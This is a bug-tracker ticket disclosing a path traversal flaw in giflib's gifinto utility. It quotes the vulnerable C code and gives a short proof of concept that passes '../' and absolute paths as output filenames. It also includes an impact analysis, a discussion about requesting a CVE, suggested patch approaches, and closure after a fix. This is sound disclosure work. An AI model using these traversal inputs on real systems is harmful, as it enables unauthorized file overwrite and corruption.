Menu

#179 Path Traversal vulnerability in giflib's gifinto utility allows creation of files in arbitrary directories due to insufficient validation of user-supplied filenames.

v1.0_(example)
closed
nobody
None
1
2026-02-19
2025-04-05
Sandeep Wawdane
No 
# Summary

Path Traversal vulnerability in giflib's `gifinto` utility allows creation of files in arbitrary directories due to insufficient validation of user-supplied filenames.

# Report Description

Path Traversal vulnerability in giflib’s `gifinto` utility allows attackers to create or overwrite files in arbitrary directories due to insufficient validation of user-supplied filenames.

# Vulnerability Description

File: `gifinto.c`

The utility accepts a filename via command-line arguments (parsed by `GAGetArgs()`), extracts its directory portion, and uses it to create a temporary file (`TempInto.XXXXXX`).  
If the input file exceeds `MinFileSize` (14 bytes), the temporary file is renamed to the original filename.

However, no validation is performed to prevent the use of `../` (relative path traversal) or absolute paths.  
This allows an attacker to supply a crafted filename and cause file creation in unintended locations.

## Vulnerable Code Snippet

```c
/* Isolate the directory where our destination is, and set tmp file name */
/* in the very same directory. This code is insecure because it creates */
/* predictable names, but it's not worth the effort and risk to fix. */
if (*FileName == NULL) {
    GIF_EXIT("No valid Filename given.");
}
if (strlen(*FileName) > STRLEN - 1) {
    GIF_EXIT("Filename too long.");
}
memset(FullPath, '\0', sizeof(FullPath));
strncpy(FullPath, *FileName, STRLEN);
if ((p = strrchr(FullPath, '/')) != NULL ||
    (p = strrchr(FullPath, '\\')) != NULL) {
    p[1] = 0;
} else if ((p = strrchr(FullPath, ':')) != NULL) {
    p[1] = 0;
} else {
    FullPath[0] = 0; /* No directory or disk specified. */
}
if (strlen(FullPath) > STRLEN - 1) {
    GIF_EXIT("Filename too long.");
}
strncpy(FoutTmpName, FullPath, STRLEN); /* First setup the Path */
/* then add a name for the tempfile */
if ((strlen(FoutTmpName) + strlen(DEFAULT_TMP_NAME)) > STRLEN - 1) {
    GIF_EXIT("Filename too long.");
}
strcat(FoutTmpName, DEFAULT_TMP_NAME);
#ifdef _WIN32
char *tmpFN = _mktemp(FoutTmpName);
#endif

Reproduction Steps / Proof of Concept (PoC)

1. Compile the Utility

gcc -o gifinto gifinto.c getarg.c -I.

2. Create a Minimal GIF File

echo -n "GIF89a1234567890" > test-sandeep.gif

3. Normal Operation (Expected Behavior)

cat test-sandeep.gif | ./gifinto output-sandeep.gif

Expected:
output-sandeep.gif is created in the current directory.

4. Exploit Using Path Traversal

cat test-sandeep.gif | ./gifinto ../traversal-sandeep.gif
cat test-sandeep.gif | ./gifinto /tmp/absolute-sandeep.gif

Observed:
Files are created outside the intended directory (e.g., in the parent directory or /tmp), confirming the vulnerability.

Verification

ls -l output-sandeep.gif ../traversal-sandeep.gif /tmp/absolute-sandeep.gif

Impact Analysis

This vulnerability can be exploited by any user or attacker with access to execute the vulnerable gifinto utility.
By supplying a malicious filename containing relative or absolute paths, an attacker can create or overwrite arbitrary files on the file system.

Exploiting this flaw may lead to:

  • File Overwrite/Corruption: Unauthorized modification or replacement of critical system or application files.
  • Denial-of-Service (DoS): Disruption of normal operations by corrupting essential files.
  • Privilege Escalation / Arbitrary Code Execution: If critical executables or scripts are overwritten, the attacker may escalate privileges or execute arbitrary code.

Discussion

  • Sebastian Pipping

    Sebastian Pipping - 2025-04-07

    @thecybersandeep are you aware of any CVE assigned to or requested for this?

     

    • Sandeep Wawdane

      Sandeep Wawdane - 2025-04-07

      H @hartwork ,
      I have already requested a CVE for this vulnerability.
      Once the CVE ID is assigned, I will update you and add it here.

       

  • Sebastian Pipping

    Sebastian Pipping - 2025-04-07

    @thecybersandeep perfect, thank you!

     

  • Sebastian Pipping

    Sebastian Pipping - 2025-04-08

    @thecybersandeep maybe I overlooked something — did you create a patch? Are you aware of a patch for this by anyone else?

     

  • Sebastian Pipping

    Sebastian Pipping - 2025-04-14

    @thecybersandeep greetings, any updates on the topics of CVE number and/or availability of a patch? Thanks!

     

  • Sandeep Wawdane

    Sandeep Wawdane - 2025-04-14

    @hartwork Thanks for asking!

    CVE Number Update:
    I’ve already submitted a request for a CVE ID for this issue. Got a confirmation email with a request ID, so it’s in process with the CVE Assignment Team.

    Patch Details:
    Patch Details:
    1. Filename Check: Can be used basename() to strip out any directory paths from the input filename and blocks anything with .. or / to prevent path traversal tricks.
    2. Safe File Creation: Temporary files are made in a secure way (like TempInto.XXXXXX) without using user input for paths.
    3. Controlled Output: The final file is only saved in the current directory using the cleaned-up filename, so no chance of writing files elsewhere.

    I’m hoping this will help secure gifinto properly!

    I’ll keep you posted on the CVE updates. If you have more questions, just ping me!

    Best,
    Sandeep

     

  • Eric S. Raymond

    Eric S. Raymond - 2026-02-19
    • Description has changed:

    Diff:

    --- old
+++ new
@@ -1,4 +1,3 @@
-
 ```markdown
 # Summary
    • status: open --> closed
     

  • Eric S. Raymond

    Eric S. Raymond - 2026-02-19

    Fix pushed.

     

Log in to post a comment.

MongoDB Logo MongoDB